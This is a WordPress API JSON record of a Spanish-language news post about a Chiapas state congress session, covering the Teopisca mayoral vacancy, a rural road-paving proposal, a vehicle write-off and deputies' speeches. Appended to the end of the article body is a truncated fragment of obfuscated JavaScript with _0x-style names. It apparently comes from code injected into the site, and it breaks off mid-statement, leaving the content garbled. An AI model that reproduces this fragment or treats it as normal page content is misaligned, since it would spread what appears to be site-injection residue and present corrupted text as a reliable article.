{"id":6751,"date":"2022-11-18T01:57:41","date_gmt":"2022-11-18T01:57:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6751"},"modified":"2022-11-18T01:57:41","modified_gmt":"2022-11-18T01:57:41","slug":"aprueban-dictamen-relativo-a-la-proteccion-de-los-derechos-politicos-electorales-del-ciudadano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6751","title":{"rendered":"Aprueban dictamen relativo a la protecci\u00f3n de los derechos pol\u00edticos electorales del ciudadano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221117-WA0109.jpg\" alt=\"\" class=\"wp-image-6752\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221117-WA0109.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221117-WA0109-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221117-WA0109-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221117-WA0109-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Tuxtla Guti\u00e9rrez, Chiapas; a 17 de noviembre de 2022.- En sesi\u00f3n ordinaria presidida por la diputada Sonia Catalina \u00c1lvarez el pleno de la Sexag\u00e9sima Octava Legislatura aprob\u00f3, -por mayor\u00eda- el dictamen que present\u00f3 la Comisi\u00f3n de Gobernaci\u00f3n y Puntos Constitucionales, relativo a la sentencia emitida por el Tribunal Electoral de Chiapas, de fecha 31 de octubre del 2022, en el juicio para la protecci\u00f3n de los derechos pol\u00edtico electorales del ciudadano, n\u00famero TEECH\/JDC\/041\/2022.<br>Lo anterior, para dar cumplimiento a lo ordenado en el considerando d\u00e9cimo tercero y resolutivo segundo, correspondiente a la sustituci\u00f3n del cargo vacante de presidente municipal designaci\u00f3n que deber\u00e1 realizarse entre los miembros del ayuntamiento municipal de Teopisca, mismos que fueron electos en el proceso electoral local ordinario, para el periodo 2021- 2024, para la debida integraci\u00f3n de dicho ayuntamiento: vacante originada por la falta definitiva por el fallecimiento del ciudadano Rub\u00e9n de Jes\u00fas Valdez D\u00edaz, al cargo de presidente municipal constitucional.<br>En el desahogo de l orden del d\u00eda, se dio lectura y se turn\u00f3 a las Comisiones Unidas de Pueblos y Comunidades Ind\u00edgenas y de Movilidad y Comunicaciones y Transportes -para su an\u00e1lisis y dictamen- el Punto de Acuerdo por el que este Congreso, solicit\u00f3 respetuosamente al Poder Ejecutivo Federal, al Instituto Nacional de los Pueblos Ind\u00edgenas y a la Secretaria de Comunicaciones y Transportes, se implemente el &#8220;programa de pavimentaci\u00f3n de caminos rurales con concreto mixto para nuestros pueblos ind\u00edgenas de Chiapas<br>Finalmente, se ley\u00f3 el oficio del Ayuntamiento de Ocotepec, Chiapas, por el que se solicita la autorizaci\u00f3n para dar de baja del patrimonio municipal un veh\u00edculo automotor por encontrarse en estado inservible, el cual se turn\u00f3 a la Comisi\u00f3n de Hacienda para el an\u00e1lisis.<br>En asuntos generales, los diputados:<br>Ra\u00fal Bonifaz Moedano, con el tema de la Reforma Electoral y el INE, donde pidi\u00f3 la reflexi\u00f3n sobre la defensa de la democracia y colaborar para construir puentes para el acuerdo.<br>Por su parte, el diputado Isidro Ovando Medina, habl\u00f3 sobre Puerto Chiapas y pidi\u00f3 emitir un exhorto para que este puerto vuelva a ser el punto aduanal importante y no irse hasta Salinas Cruz Oaxaca, subray\u00f3 que se regrese la aduana por el manejo de exportaci\u00f3n.<br>Floralma G\u00f3mez Santiz, toc\u00f3 el tema en el marco de la Prevenci\u00f3n del Abuso Infantil, donde se\u00f1al\u00f3 los tipos de acoso, la trata y el maltrato emocional, sexual y familiar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas; a 17 de noviembre de 2022.- En sesi\u00f3n ordinaria presidida por la diputada Sonia Catalina \u00c1lvarez el pleno de la Sexag\u00e9sima Octava Legislatura aprob\u00f3, -por mayor\u00eda- el dictamen que present\u00f3 la Comisi\u00f3n de Gobernaci\u00f3n y Puntos Constitucionales, relativo a la sentencia emitida por el Tribunal Electoral de Chiapas, de fecha 31 de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6752,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-6751","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6751"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6751\/revisions"}],"predecessor-version":[{"id":6753,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6751\/revisions\/6753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6752"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}